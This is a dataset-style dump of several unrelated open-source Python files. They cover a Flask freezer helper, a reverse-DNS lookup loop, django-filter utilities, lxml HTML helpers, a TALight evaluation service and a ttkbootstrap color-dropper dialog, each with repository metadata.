test_function(([], [1]))
test_function(([1], 1))
test_function(([2, 1], 2))
tests()
| 744 | 0 | 92 |
965488f514c2ae38817ebced1bc0719fbe793eaa | 1,518 | py | Python | naucse/freezer.py | torsava/naucse.python.cz | 7770a151f81860f422121135a75768dbfbf51a23 | [
"MIT"
] | null | null | null | naucse/freezer.py | torsava/naucse.python.cz | 7770a151f81860f422121135a75768dbfbf51a23 | [
"MIT"
] | null | null | null | naucse/freezer.py | torsava/naucse.python.cz | 7770a151f81860f422121135a75768dbfbf51a23 | [
"MIT"
] | null | null | null | import contextlib
from flask_frozen import UrlForLogger, Freezer
from naucse.utils.routes import absolute_urls_to_freeze
class AllLinksLogger(UrlForLogger):
""" AllLinksLogger primarily logs ``url_for`` calls, but yields urls from ``absolute_urls_to_freeze`` as well.
"""
def iter_calls(self):
""" Yields all logged urls and links parsed from content.
Unfortunately, ``yield from`` cannot be used as the queues are modified on the go.
"""
while self.logged_calls or absolute_urls_to_freeze:
if self.logged_calls:
yield self.logged_calls.popleft()
# prefer urls from :atrr:`logged_calls` - so, ideally, cache is populated from the base repository
continue
if absolute_urls_to_freeze:
yield absolute_urls_to_freeze.popleft()
@contextlib.contextmanager
def temporary_url_for_logger(app):
""" A context manager which temporary adds a new UrlForLogger to the app and yields it, so it can be used
to get logged calls.
"""
logger = UrlForLogger(app)
yield logger
# reverses the following operating from :class:`UrlForLogger`
# self.app.url_default_functions.setdefault(None, []).insert(0, logger)
app.url_default_functions[None].pop(0)
| 34.5 | 115 | 0.692358 | import contextlib
from flask_frozen import UrlForLogger, Freezer
from naucse.utils.routes import absolute_urls_to_freeze
class AllLinksLogger(UrlForLogger):
""" AllLinksLogger primarily logs ``url_for`` calls, but yields urls from ``absolute_urls_to_freeze`` as well.
"""
def iter_calls(self):
""" Yields all logged urls and links parsed from content.
Unfortunately, ``yield from`` cannot be used as the queues are modified on the go.
"""
while self.logged_calls or absolute_urls_to_freeze:
if self.logged_calls:
yield self.logged_calls.popleft()
# prefer urls from :atrr:`logged_calls` - so, ideally, cache is populated from the base repository
continue
if absolute_urls_to_freeze:
yield absolute_urls_to_freeze.popleft()
@contextlib.contextmanager
def temporary_url_for_logger(app):
""" A context manager which temporary adds a new UrlForLogger to the app and yields it, so it can be used
to get logged calls.
"""
logger = UrlForLogger(app)
yield logger
# reverses the following operating from :class:`UrlForLogger`
# self.app.url_default_functions.setdefault(None, []).insert(0, logger)
app.url_default_functions[None].pop(0)
class NaucseFreezer(Freezer):
def __init__(self, app):
super().__init__(app)
self.url_for_logger = AllLinksLogger(app) # override the default url_for_logger with our modified version
| 148 | 8 | 50 |
4df80a732327deba391ee66fbd56177b587b60c7 | 188 | py | Python | consulting_reverse/ping_get_reverse.py | andradjp/tools | 4cb2123563518f8a029fa9d67e9e6eabd18aa863 | [
"MIT"
] | null | null | null | consulting_reverse/ping_get_reverse.py | andradjp/tools | 4cb2123563518f8a029fa9d67e9e6eabd18aa863 | [
"MIT"
] | null | null | null | consulting_reverse/ping_get_reverse.py | andradjp/tools | 4cb2123563518f8a029fa9d67e9e6eabd18aa863 | [
"MIT"
] | null | null | null | import ipaddress
import socket
range = ipaddress.IPv4Network('10.7.0.0/22')
for x in range:
try:
print(socket.gethostbyaddr(str(x))[0])
except socket.herror:
pass
| 18.8 | 46 | 0.659574 | import ipaddress
import socket
range = ipaddress.IPv4Network('10.7.0.0/22')
for x in range:
try:
print(socket.gethostbyaddr(str(x))[0])
except socket.herror:
pass
| 0 | 0 | 0 |
d0e75528430acec4c392c38b5859feb156cb5d4b | 325 | py | Python | docs/source/notebooks/01.py | JulianKarlBauer/orientation_averaging_mean_field | 75acb5ed58aa6a69cec7508d3d45865bbab3ed3c | [
"MIT"
] | null | null | null | docs/source/notebooks/01.py | JulianKarlBauer/orientation_averaging_mean_field | 75acb5ed58aa6a69cec7508d3d45865bbab3ed3c | [
"MIT"
] | null | null | null | docs/source/notebooks/01.py | JulianKarlBauer/orientation_averaging_mean_field | 75acb5ed58aa6a69cec7508d3d45865bbab3ed3c | [
"MIT"
] | null | null | null | # # Get points witin admissible parameter space
import planarfibers
import pandas as pd
pd.set_option('display.max_columns', 100)
pd.set_option('display.width', 1000)
df = planarfibers.discretization.get_points_on_slices(
radii=["0", "1/2", "9/10"],
la1s=["1/2", "4/6", "5/6", "1"],
numeric=False,
)
print(df)
| 21.666667 | 54 | 0.683077 | # # Get points witin admissible parameter space
import planarfibers
import pandas as pd
pd.set_option('display.max_columns', 100)
pd.set_option('display.width', 1000)
df = planarfibers.discretization.get_points_on_slices(
radii=["0", "1/2", "9/10"],
la1s=["1/2", "4/6", "5/6", "1"],
numeric=False,
)
print(df)
| 0 | 0 | 0 |
06decb392e619bb9bfe10a2d0ce6c1804c2c06e6 | 1,077 | py | Python | virtman/virtman/cmd/virtman.py | vmthunder/packages | e530e243007a0f403cad1b67a490ffb9687969c3 | [
"Apache-2.0"
] | 2 | 2015-03-15T11:12:53.000Z | 2018-10-12T03:05:52.000Z | virtman/virtman/cmd/virtman.py | vmthunder/packages | e530e243007a0f403cad1b67a490ffb9687969c3 | [
"Apache-2.0"
] | null | null | null | virtman/virtman/cmd/virtman.py | vmthunder/packages | e530e243007a0f403cad1b67a490ffb9687969c3 | [
"Apache-2.0"
] | null | null | null | #!/usr/bin/env python
import sys
import threading
import time
from oslo.config import cfg
from virtman import compute
from virtman.openstack.common import log as logging
#TODO: Auto determine host ip if not filled in conf file
CONF = cfg.CONF
if __name__ == '__main__':
CONF(sys.argv[1:], project='virtman',
default_config_files = ['/root/packages/virtman/etc/virtman/virtman.conf'])
logging.setup('virtman')
start()
| 26.925 | 85 | 0.601671 | #!/usr/bin/env python
import sys
import threading
import time
from oslo.config import cfg
from virtman import compute
from virtman.openstack.common import log as logging
#TODO: Auto determine host ip if not filled in conf file
CONF = cfg.CONF
def start():
cn = compute.Compute()
class HeartBeater(threading.Thread):
def __init__(self, thread_name):
super(HeartBeater, self).__init__(name=thread_name)
def run(self):
def clock():
LOG = logging.getLogger(__name__)
LOG.debug("At %s heartbeat once" % time.asctime())
cn.heartbeat()
time.sleep(CONF.heartbeat_interval)
#TODO: the max depth of recursion
clock()
clock()
heartbeat = HeartBeater('heartbeat')
heartbeat.start()
if __name__ == '__main__':
CONF(sys.argv[1:], project='virtman',
default_config_files = ['/root/packages/virtman/etc/virtman/virtman.conf'])
logging.setup('virtman')
start()
| 588 | 0 | 25 |
1985c161fbb9d2809684a53e570e6a3feafe0a55 | 1,380 | py | Python | auger/utils/html.py | m-flak/auger | 5b58e549405bddcc6fc67867c0c151f415e01364 | [
"Apache-2.0"
] | 1 | 2021-05-22T07:47:58.000Z | 2021-05-22T07:47:58.000Z | auger/utils/html.py | m-flak/auger | 5b58e549405bddcc6fc67867c0c151f415e01364 | [
"Apache-2.0"
] | 1 | 2020-01-08T00:11:36.000Z | 2020-01-08T00:17:55.000Z | auger/utils/html.py | m-flak/auger | 5b58e549405bddcc6fc67867c0c151f415e01364 | [
"Apache-2.0"
] | null | null | null | import lxml.html
class QuickTag:
""" Callable to quickly create lxml element and access it.
"""
def __call__(self, as_element=True):
"""If `as_element` is `False`, return tuple of content, tag.
Otherwise, lxml.html.Element class is returned.
"""
if as_element:
return self._element
return self._content, self._tag
def clear_body_and_insert(html, insert_content, insert_tag):
"""Clears the body of an HTML string.
Appends <insert_tag>insert_content</insert_tag> to the body.
"""
document = lxml.html.fromstring(html)
for kid in document.body.getchildren():
document.body.remove(kid)
return append_to_body(document, insert_content, insert_tag)
def append_to_body(html, append_content, append_tag):
"""Appends <append_tag>append_content</append_tag> to an HTML string or
an lxml document.
"""
if isinstance(html, lxml.html.HtmlElement):
document = html
else:
document = lxml.html.fromstring(html)
append_me = QuickTag(append_content, append_tag)
document.body.append(append_me())
return lxml.html.tostring(document, method='html', encoding='unicode')
| 30 | 75 | 0.673188 | import lxml.html
class QuickTag:
""" Callable to quickly create lxml element and access it.
"""
def __init__(self, content, tag):
self._tag = tag
self._content = content
self._element = lxml.html.Element(tag)
self._element.text = content
def __call__(self, as_element=True):
"""If `as_element` is `False`, return tuple of content, tag.
Otherwise, lxml.html.Element class is returned.
"""
if as_element:
return self._element
return self._content, self._tag
def clear_body_and_insert(html, insert_content, insert_tag):
"""Clears the body of an HTML string.
Appends <insert_tag>insert_content</insert_tag> to the body.
"""
document = lxml.html.fromstring(html)
for kid in document.body.getchildren():
document.body.remove(kid)
return append_to_body(document, insert_content, insert_tag)
def append_to_body(html, append_content, append_tag):
"""Appends <append_tag>append_content</append_tag> to an HTML string or
an lxml document.
"""
if isinstance(html, lxml.html.HtmlElement):
document = html
else:
document = lxml.html.fromstring(html)
append_me = QuickTag(append_content, append_tag)
document.body.append(append_me())
return lxml.html.tostring(document, method='html', encoding='unicode')
| 152 | 0 | 26 |
8a7f0387ee1e5a8d71ef14387eec554a34d31620 | 6,789 | py | Python | django_filters/utils.py | timothyjlaurent/django-filter | 06b1a6d65a2b6eccaac91b8ebf17154f9206c7fe | [
"BSD-3-Clause"
] | null | null | null | django_filters/utils.py | timothyjlaurent/django-filter | 06b1a6d65a2b6eccaac91b8ebf17154f9206c7fe | [
"BSD-3-Clause"
] | 1 | 2021-03-26T00:33:06.000Z | 2021-03-26T00:33:06.000Z | django_filters/utils.py | timothyjlaurent/django-filter | 06b1a6d65a2b6eccaac91b8ebf17154f9206c7fe | [
"BSD-3-Clause"
] | null | null | null | import warnings
from django.conf import settings
from django.core.exceptions import FieldError
from django.db import models
from django.db.models.constants import LOOKUP_SEP
from django.db.models.expressions import Expression
from django.db.models.fields import FieldDoesNotExist
from django.db.models.fields.related import RelatedField, ForeignObjectRel
from django.utils import six, timezone
from django.utils.encoding import force_text
from django.utils.translation import ugettext as _
try:
from django.forms.utils import pretty_name
except ImportError: # Django 1.8
from django.forms.forms import pretty_name
from .compat import remote_field, remote_model
from .exceptions import FieldLookupError
def try_dbfield(fn, field_class):
"""
Try ``fn`` with the DB ``field_class`` by walking its
MRO until a result is found.
ex::
_try_dbfield(field_dict.get, models.CharField)
"""
# walk the mro, as field_class could be a derived model field.
for cls in field_class.mro():
# skip if cls is models.Field
if cls is models.Field:
continue
data = fn(cls)
if data:
return data
def get_model_field(model, field_name):
"""
Get a ``model`` field, traversing relationships
in the ``field_name``.
ex::
f = get_model_field(Book, 'author__first_name')
"""
fields = get_field_parts(model, field_name)
return fields[-1] if fields else None
def get_field_parts(model, field_name):
"""
Get the field parts that represent the traversable relationships from the
base ``model`` to the final field, described by ``field_name``.
ex::
>>> parts = get_field_parts(Book, 'author__first_name')
>>> [p.verbose_name for p in parts]
['author', 'first name']
"""
parts = field_name.split(LOOKUP_SEP)
opts = model._meta
fields = []
# walk relationships
for name in parts:
try:
field = opts.get_field(name)
except FieldDoesNotExist:
return None
fields.append(field)
if isinstance(field, RelatedField):
opts = remote_model(field)._meta
elif isinstance(field, ForeignObjectRel):
opts = field.related_model._meta
return fields
def resolve_field(model_field, lookup_expr):
"""
Resolves a ``lookup_expr`` into its final output field, given
the initial ``model_field``. The lookup expression should only contain
transforms and lookups, not intermediary model field parts.
Note:
This method is based on django.db.models.sql.query.Query.build_lookup
For more info on the lookup API:
https://docs.djangoproject.com/en/1.9/ref/models/lookups/
"""
query = model_field.model._default_manager.all().query
lhs = Expression(model_field)
lookups = lookup_expr.split(LOOKUP_SEP)
assert len(lookups) > 0
try:
while lookups:
name = lookups[0]
# If there is just one part left, try first get_lookup() so
# that if the lhs supports both transform and lookup for the
# name, then lookup will be picked.
if len(lookups) == 1:
final_lookup = lhs.get_lookup(name)
if not final_lookup:
# We didn't find a lookup. We are going to interpret
# the name as transform, and do an Exact lookup against
# it.
lhs = query.try_transform(lhs, name, lookups)
final_lookup = lhs.get_lookup('exact')
return lhs.output_field, final_lookup.lookup_name
lhs = query.try_transform(lhs, name, lookups)
lookups = lookups[1:]
except FieldError as e:
six.raise_from(FieldLookupError(model_field, lookup_expr), e)
def verbose_field_name(model, field_name):
"""
Get the verbose name for a given ``field_name``. The ``field_name``
will be traversed across relationships. Returns '[invalid name]' for
any field name that cannot be traversed.
ex::
>>> verbose_field_name(Article, 'author__name')
'author name'
"""
if field_name is None:
return '[invalid name]'
parts = get_field_parts(model, field_name)
if not parts:
return '[invalid name]'
names = []
for part in parts:
if isinstance(part, ForeignObjectRel):
names.append(part.related_name)
else:
names.append(part.verbose_name)
return ' '.join(names)
def verbose_lookup_expr(lookup_expr):
"""
Get a verbose, more humanized expression for a given ``lookup_expr``.
Each part in the expression is looked up in the ``FILTERS_VERBOSE_LOOKUPS``
dictionary. Missing keys will simply default to itself.
ex::
>>> verbose_lookup_expr('year__lt')
'year is less than'
# with `FILTERS_VERBOSE_LOOKUPS = {}`
>>> verbose_lookup_expr('year__lt')
'year lt'
"""
from .conf import settings as app_settings
VERBOSE_LOOKUPS = app_settings.VERBOSE_LOOKUPS or {}
lookups = [
force_text(VERBOSE_LOOKUPS.get(lookup, _(lookup)))
for lookup in lookup_expr.split(LOOKUP_SEP)
]
return ' '.join(lookups)
def label_for_filter(model, field_name, lookup_expr, exclude=False):
"""
Create a generic label suitable for a filter.
ex::
>>> label_for_filter(Article, 'author__name', 'in')
'auther name is in'
"""
name = verbose_field_name(model, field_name)
verbose_expression = [_('exclude'), name] if exclude else [name]
# iterable lookups indicate a LookupTypeField, which should not be verbose
if isinstance(lookup_expr, six.string_types):
verbose_expression += [verbose_lookup_expr(lookup_expr)]
verbose_expression = [force_text(part) for part in verbose_expression if part]
verbose_expression = pretty_name(' '.join(verbose_expression))
return verbose_expression
| 29.517391 | 86 | 0.661953 | import warnings
from django.conf import settings
from django.core.exceptions import FieldError
from django.db import models
from django.db.models.constants import LOOKUP_SEP
from django.db.models.expressions import Expression
from django.db.models.fields import FieldDoesNotExist
from django.db.models.fields.related import RelatedField, ForeignObjectRel
from django.utils import six, timezone
from django.utils.encoding import force_text
from django.utils.translation import ugettext as _
try:
from django.forms.utils import pretty_name
except ImportError: # Django 1.8
from django.forms.forms import pretty_name
from .compat import remote_field, remote_model
from .exceptions import FieldLookupError
def deprecate(msg, level_modifier=0):
warnings.warn(
"%s See: https://django-filter.readthedocs.io/en/latest/migration.html" % msg,
DeprecationWarning, stacklevel=3 + level_modifier)
def try_dbfield(fn, field_class):
"""
Try ``fn`` with the DB ``field_class`` by walking its
MRO until a result is found.
ex::
_try_dbfield(field_dict.get, models.CharField)
"""
# walk the mro, as field_class could be a derived model field.
for cls in field_class.mro():
# skip if cls is models.Field
if cls is models.Field:
continue
data = fn(cls)
if data:
return data
def get_all_model_fields(model):
opts = model._meta
return [
f.name for f in sorted(opts.fields + opts.many_to_many)
if not isinstance(f, models.AutoField) and
not (getattr(remote_field(f), 'parent_link', False))
]
def get_model_field(model, field_name):
"""
Get a ``model`` field, traversing relationships
in the ``field_name``.
ex::
f = get_model_field(Book, 'author__first_name')
"""
fields = get_field_parts(model, field_name)
return fields[-1] if fields else None
def get_field_parts(model, field_name):
"""
Get the field parts that represent the traversable relationships from the
base ``model`` to the final field, described by ``field_name``.
ex::
>>> parts = get_field_parts(Book, 'author__first_name')
>>> [p.verbose_name for p in parts]
['author', 'first name']
"""
parts = field_name.split(LOOKUP_SEP)
opts = model._meta
fields = []
# walk relationships
for name in parts:
try:
field = opts.get_field(name)
except FieldDoesNotExist:
return None
fields.append(field)
if isinstance(field, RelatedField):
opts = remote_model(field)._meta
elif isinstance(field, ForeignObjectRel):
opts = field.related_model._meta
return fields
def resolve_field(model_field, lookup_expr):
"""
Resolves a ``lookup_expr`` into its final output field, given
the initial ``model_field``. The lookup expression should only contain
transforms and lookups, not intermediary model field parts.
Note:
This method is based on django.db.models.sql.query.Query.build_lookup
For more info on the lookup API:
https://docs.djangoproject.com/en/1.9/ref/models/lookups/
"""
query = model_field.model._default_manager.all().query
lhs = Expression(model_field)
lookups = lookup_expr.split(LOOKUP_SEP)
assert len(lookups) > 0
try:
while lookups:
name = lookups[0]
# If there is just one part left, try first get_lookup() so
# that if the lhs supports both transform and lookup for the
# name, then lookup will be picked.
if len(lookups) == 1:
final_lookup = lhs.get_lookup(name)
if not final_lookup:
# We didn't find a lookup. We are going to interpret
# the name as transform, and do an Exact lookup against
# it.
lhs = query.try_transform(lhs, name, lookups)
final_lookup = lhs.get_lookup('exact')
return lhs.output_field, final_lookup.lookup_name
lhs = query.try_transform(lhs, name, lookups)
lookups = lookups[1:]
except FieldError as e:
six.raise_from(FieldLookupError(model_field, lookup_expr), e)
def handle_timezone(value):
if settings.USE_TZ and timezone.is_naive(value):
return timezone.make_aware(value, timezone.get_default_timezone())
elif not settings.USE_TZ and timezone.is_aware(value):
return timezone.make_naive(value, timezone.UTC())
return value
def verbose_field_name(model, field_name):
"""
Get the verbose name for a given ``field_name``. The ``field_name``
will be traversed across relationships. Returns '[invalid name]' for
any field name that cannot be traversed.
ex::
>>> verbose_field_name(Article, 'author__name')
'author name'
"""
if field_name is None:
return '[invalid name]'
parts = get_field_parts(model, field_name)
if not parts:
return '[invalid name]'
names = []
for part in parts:
if isinstance(part, ForeignObjectRel):
names.append(part.related_name)
else:
names.append(part.verbose_name)
return ' '.join(names)
def verbose_lookup_expr(lookup_expr):
"""
Get a verbose, more humanized expression for a given ``lookup_expr``.
Each part in the expression is looked up in the ``FILTERS_VERBOSE_LOOKUPS``
dictionary. Missing keys will simply default to itself.
ex::
>>> verbose_lookup_expr('year__lt')
'year is less than'
# with `FILTERS_VERBOSE_LOOKUPS = {}`
>>> verbose_lookup_expr('year__lt')
'year lt'
"""
from .conf import settings as app_settings
VERBOSE_LOOKUPS = app_settings.VERBOSE_LOOKUPS or {}
lookups = [
force_text(VERBOSE_LOOKUPS.get(lookup, _(lookup)))
for lookup in lookup_expr.split(LOOKUP_SEP)
]
return ' '.join(lookups)
def label_for_filter(model, field_name, lookup_expr, exclude=False):
"""
Create a generic label suitable for a filter.
ex::
>>> label_for_filter(Article, 'author__name', 'in')
'auther name is in'
"""
name = verbose_field_name(model, field_name)
verbose_expression = [_('exclude'), name] if exclude else [name]
# iterable lookups indicate a LookupTypeField, which should not be verbose
if isinstance(lookup_expr, six.string_types):
verbose_expression += [verbose_lookup_expr(lookup_expr)]
verbose_expression = [force_text(part) for part in verbose_expression if part]
verbose_expression = pretty_name(' '.join(verbose_expression))
return verbose_expression
| 679 | 0 | 69 |
4917a993e949da8613ed9d7462ad21e579c8654e | 2,406 | py | Python | example_problems/tutorial/magic_index/services/eval_play1_server.py | romeorizzi/TALight | 2b694cb487f41dd0d36d7aa39f5c9c5a21bfc18e | [
"MIT"
] | 4 | 2021-06-27T13:27:24.000Z | 2022-03-24T10:46:28.000Z | example_problems/tutorial/magic_index/services/eval_play1_server.py | romeorizzi/TALight | 2b694cb487f41dd0d36d7aa39f5c9c5a21bfc18e | [
"MIT"
] | 1 | 2021-01-23T06:50:31.000Z | 2021-03-17T15:35:18.000Z | example_problems/tutorial/magic_index/services/eval_play1_server.py | romeorizzi/TALight | 2b694cb487f41dd0d36d7aa39f5c9c5a21bfc18e | [
"MIT"
] | 5 | 2021-04-01T15:21:57.000Z | 2022-01-29T15:07:38.000Z | #!/usr/bin/env python3
from sys import stderr, exit
import re
from TALinputs import TALinput
from multilanguage import Env, Lang, TALcolors
from magic_indexes_lib import *
# METADATA OF THIS TAL_SERVICE:
args_list = [
('config',str),
('moves',str),
('goal',str),
('feedback',str)
]
ENV =Env(args_list)
TAc =TALcolors(ENV)
LANG=Lang(ENV, TAc, lambda fstring: eval(f"f'{fstring}'"))
# START CODING YOUR SERVICE:
final_configuration = ENV['config'].split(',')
indexes = ENV['moves'].split(',')
vector_len = len(final_configuration)
# this vector contains -1,0,1 and it's filled by the server with the worst case scenario and it's never shown to the user during the game.
server_vector = [None] * vector_len
# this variable contains the questions made by the user during the game
wasted_dollars = 0
# this boolean variable is initialized to True in case ENV['feedback'] == 'spot_first_gift'
firstGift = True
TAc.print(LANG.render_feedback("random_vector", f'All right, let us evaluate your moves...'), "yellow", ["bold"])
for n_move in range(0,len(final_configuration)):
chosen_index = int(indexes[n_move])
if '0' not in server_vector:
unknown, optimal_pos = get_positions_f(server_vector)
if chosen_index != optimal_pos:
if ENV['feedback'] == 'spot_first_gift' and firstGift:
TAc.print(LANG.render_feedback("first error", f'# Here you made your first mistake!'), "yellow", ["bold"])
firstGift = False
elif ENV['feedback'] == 'spot_every_gift':
TAc.print(LANG.render_feedback("error", f'# Here you made a mistake!'), "yellow", ["bold"])
else:
unknown, optimal_pos = get_positions_g(server_vector)
if chosen_index not in optimal_pos:
if ENV['feedback'] == 'spot_first_gift' and firstGift:
TAc.print(LANG.render_feedback("first error", f'# Here you made your first mistake!'), "yellow", ["bold"])
firstGift = False
elif ENV['feedback'] == 'spot_every_gift':
TAc.print(LANG.render_feedback("error", f'# Here you made a mistake!'), "yellow", ["bold"])
update_server_vec(chosen_index, final_configuration[chosen_index],server_vector)
wasted_dollars += 1
min_questions = f(vector_len)
check_goal_eval(ENV['goal'], ENV['feedback'],wasted_dollars, min_questions, TAc, LANG)
| 33.887324 | 138 | 0.671654 | #!/usr/bin/env python3
from sys import stderr, exit
import re
from TALinputs import TALinput
from multilanguage import Env, Lang, TALcolors
from magic_indexes_lib import *
# METADATA OF THIS TAL_SERVICE:
args_list = [
('config',str),
('moves',str),
('goal',str),
('feedback',str)
]
ENV =Env(args_list)
TAc =TALcolors(ENV)
LANG=Lang(ENV, TAc, lambda fstring: eval(f"f'{fstring}'"))
# START CODING YOUR SERVICE:
final_configuration = ENV['config'].split(',')
indexes = ENV['moves'].split(',')
vector_len = len(final_configuration)
# this vector contains -1,0,1 and it's filled by the server with the worst case scenario and it's never shown to the user during the game.
server_vector = [None] * vector_len
# this variable contains the questions made by the user during the game
wasted_dollars = 0
# this boolean variable is initialized to True in case ENV['feedback'] == 'spot_first_gift'
firstGift = True
TAc.print(LANG.render_feedback("random_vector", f'All right, let us evaluate your moves...'), "yellow", ["bold"])
for n_move in range(0,len(final_configuration)):
chosen_index = int(indexes[n_move])
if '0' not in server_vector:
unknown, optimal_pos = get_positions_f(server_vector)
if chosen_index != optimal_pos:
if ENV['feedback'] == 'spot_first_gift' and firstGift:
TAc.print(LANG.render_feedback("first error", f'# Here you made your first mistake!'), "yellow", ["bold"])
firstGift = False
elif ENV['feedback'] == 'spot_every_gift':
TAc.print(LANG.render_feedback("error", f'# Here you made a mistake!'), "yellow", ["bold"])
else:
unknown, optimal_pos = get_positions_g(server_vector)
if chosen_index not in optimal_pos:
if ENV['feedback'] == 'spot_first_gift' and firstGift:
TAc.print(LANG.render_feedback("first error", f'# Here you made your first mistake!'), "yellow", ["bold"])
firstGift = False
elif ENV['feedback'] == 'spot_every_gift':
TAc.print(LANG.render_feedback("error", f'# Here you made a mistake!'), "yellow", ["bold"])
update_server_vec(chosen_index, final_configuration[chosen_index],server_vector)
wasted_dollars += 1
min_questions = f(vector_len)
check_goal_eval(ENV['goal'], ENV['feedback'],wasted_dollars, min_questions, TAc, LANG)
| 0 | 0 | 0 |
90ce9593ef75ba940c71128b9b153e7ed4868e38 | 6,715 | py | Python | src/ttkbootstrap/dialogs/colordropper.py | 745404527/ttkbootstrap | 692d780cf178dc2a3a7f55953f17899248f3fbae | [
"MIT"
] | 2 | 2022-01-23T01:48:38.000Z | 2022-01-24T00:30:58.000Z | src/ttkbootstrap/dialogs/colordropper.py | 745404527/ttkbootstrap | 692d780cf178dc2a3a7f55953f17899248f3fbae | [
"MIT"
] | null | null | null | src/ttkbootstrap/dialogs/colordropper.py | 745404527/ttkbootstrap | 692d780cf178dc2a3a7f55953f17899248f3fbae | [
"MIT"
] | 1 | 2022-03-19T08:47:08.000Z | 2022-03-19T08:47:08.000Z | """
NOTE: https://stackoverflow.com/questions/25467288/pils-imagegrab-is-capturing-at-the-wrong-resolution
!! This widget is not currently supported on Mac OS
"""
import tkinter as tk
import ttkbootstrap as ttk
from ttkbootstrap.constants import *
from ttkbootstrap import colorutils, utility
from PIL import ImageGrab, ImageTk, Image
from collections import namedtuple
ColorChoice = namedtuple('ColorChoice', 'rgb hsl hex')
class ColorDropperDialog:
"""A widget that displays an indicator and a zoom window for
selecting a color on the screen.
Left-click the mouse button to select a color. The result is
stored in the `result` property as a `ColorChoice` tuple which
contains named fields for rgb, hsl, and hex color models.
Zoom in and out on the zoom window by using the mouse wheel.
This widget is implemented for **Windows** and **Linux** only.

!!! warning "high resolution displays"
This widget may not function properly on high resolution
displays if you are not using the application in high
resolution mode. This is enabled automatically on Windows.
"""
def build_screenshot_canvas(self):
"""Build the screenshot canvas"""
self.screenshot_canvas = ttk.Canvas(
self.toplevel, cursor='tcross', autostyle=False)
self.screenshot_data = ImageGrab.grab()
self.screenshot_image = ImageTk.PhotoImage(self.screenshot_data)
self.screenshot_canvas.create_image(
0, 0, image=self.screenshot_image, anchor=NW)
self.screenshot_canvas.pack(fill=BOTH, expand=YES)
def build_zoom_toplevel(self, master):
"""Build the toplevel widget that shows the zoomed version of
the pixels underneath the mouse cursor."""
height = utility.scale_size(self.toplevel, 100)
width = utility.scale_size(self.toplevel, 100)
text_xoffset = utility.scale_size(self.toplevel, 50)
text_yoffset = utility.scale_size(self.toplevel, 50)
toplevel = ttk.Toplevel(master)
toplevel.transient(master)
if self.toplevel.winsys == 'x11':
toplevel.attributes('-type', 'tooltip')
else:
toplevel.overrideredirect(True)
toplevel.geometry(f'{width}x{height}')
toplevel.lift()
self.zoom_canvas = ttk.Canvas(
toplevel, borderwidth=1, height=self.zoom_height, width=self.zoom_width)
self.zoom_canvas.create_image(0, 0, tags=['image'], anchor=NW)
self.zoom_canvas.create_text(
text_xoffset, text_yoffset, text="+", fill="white", tags=['indicator'])
self.zoom_canvas.pack(fill=BOTH, expand=YES)
self.zoom_toplevel = toplevel
def on_mouse_wheel(self, event: tk.Event):
"""Zoom in and out on the image underneath the mouse
TODO Cross platform testing needed
"""
if self.toplevel.winsys.lower() == 'win32':
delta = -int(event.delta / 120)
elif self.toplevel.winsys.lower() == 'aqua':
delta = -event.delta
elif event.num == 4:
delta = -1
elif event.num == 5:
delta = 1
self.zoom_level += delta
self.on_mouse_motion()
def on_left_click(self, _):
"""Capture the color underneath the mouse cursor and destroy
the toplevel widget"""
# add logic here to capture the image color
hx = self.get_hover_color()
hsl = colorutils.color_to_hsl(hx)
rgb = colorutils.color_to_rgb(hx)
self.result.set(ColorChoice(rgb, hsl, hx))
self.toplevel.destroy()
self.zoom_toplevel.destroy()
self.toplevel.grab_release()
return self.result.get()
def on_right_click(self, _):
"""Close the color dropper without saving any color information"""
self.zoom_toplevel.destroy()
self.toplevel.grab_release()
self.toplevel.destroy()
def on_mouse_motion(self, event=None):
"""Callback for mouse motion"""
if event is None:
x, y = self.toplevel.winfo_pointerxy()
else:
x = event.x
y = event.y
# move snip window
self.zoom_toplevel.geometry(
f'+{x+self.zoom_xoffset}+{y+self.zoom_yoffset}')
# update the snip image
bbox = (x-self.zoom_level, y-self.zoom_level,
x+self.zoom_level+1, y+self.zoom_level+1)
size = (self.zoom_width, self.zoom_height)
self.zoom_data = self.screenshot_data.crop(
bbox).resize(size, Image.BOX)
self.zoom_image = ImageTk.PhotoImage(self.zoom_data)
self.zoom_canvas.itemconfig('image', image=self.zoom_image)
hover_color = self.get_hover_color()
contrast_color = colorutils.contrast_color(hover_color, 'hex')
self.zoom_canvas.itemconfig('indicator', fill=contrast_color)
def get_hover_color(self):
"""Get the color that is hovered over by the mouse cursor."""
x1, y1, x2, y2 = self.zoom_canvas.bbox('indicator')
x = x1 + (x2-x1)//2
y = y1 + (y2-y2)//2
r, g, b = self.zoom_data.getpixel((x, y))
hx = colorutils.color_to_hex((r, g, b))
return hx
def show(self):
"""Show the toplevel window"""
self.toplevel = ttk.Toplevel(alpha=1)
self.toplevel.wm_attributes('-fullscreen', True)
self.build_screenshot_canvas()
# event binding
self.toplevel.bind("<Motion>", self.on_mouse_motion, "+")
self.toplevel.bind("<Button-1>", self.on_left_click, "+")
self.toplevel.bind("<Button-3>", self.on_right_click, "+")
if self.toplevel.winsys.lower() == 'x11':
self.toplevel.bind("<Button-4>", self.on_mouse_wheel, "+")
self.toplevel.bind("<Button-5>", self.on_mouse_wheel, "+")
else:
self.toplevel.bind("<MouseWheel>", self.on_mouse_wheel, "+")
# initial snip setup
self.zoom_level = 2
self.zoom_toplevel: ttk.Toplevel = None
self.zoom_data = None
self.zoom_image = None
self.zoom_height = utility.scale_size(self.toplevel, 100)
self.zoom_width = utility.scale_size(self.toplevel, 100)
self.zoom_xoffset = utility.scale_size(self.toplevel, 10)
self.zoom_yoffset = utility.scale_size(self.toplevel, 10)
self.build_zoom_toplevel(self.toplevel)
self.toplevel.grab_set()
self.toplevel.lift('.')
self.zoom_toplevel.lift(self.toplevel)
self.on_mouse_motion()
| 39.269006 | 106 | 0.639464 | """
NOTE: https://stackoverflow.com/questions/25467288/pils-imagegrab-is-capturing-at-the-wrong-resolution
!! This widget is not currently supported on Mac OS
"""
import tkinter as tk
import ttkbootstrap as ttk
from ttkbootstrap.constants import *
from ttkbootstrap import colorutils, utility
from PIL import ImageGrab, ImageTk, Image
from collections import namedtuple
ColorChoice = namedtuple('ColorChoice', 'rgb hsl hex')
class ColorDropperDialog:
"""A widget that displays an indicator and a zoom window for
selecting a color on the screen.
Left-click the mouse button to select a color. The result is
stored in the `result` property as a `ColorChoice` tuple which
contains named fields for rgb, hsl, and hex color models.
Zoom in and out on the zoom window by using the mouse wheel.
This widget is implemented for **Windows** and **Linux** only.

!!! warning "high resolution displays"
This widget may not function properly on high resolution
displays if you are not using the application in high
resolution mode. This is enabled automatically on Windows.
"""
def __init__(self):
self.toplevel: ttk.Toplevel = None
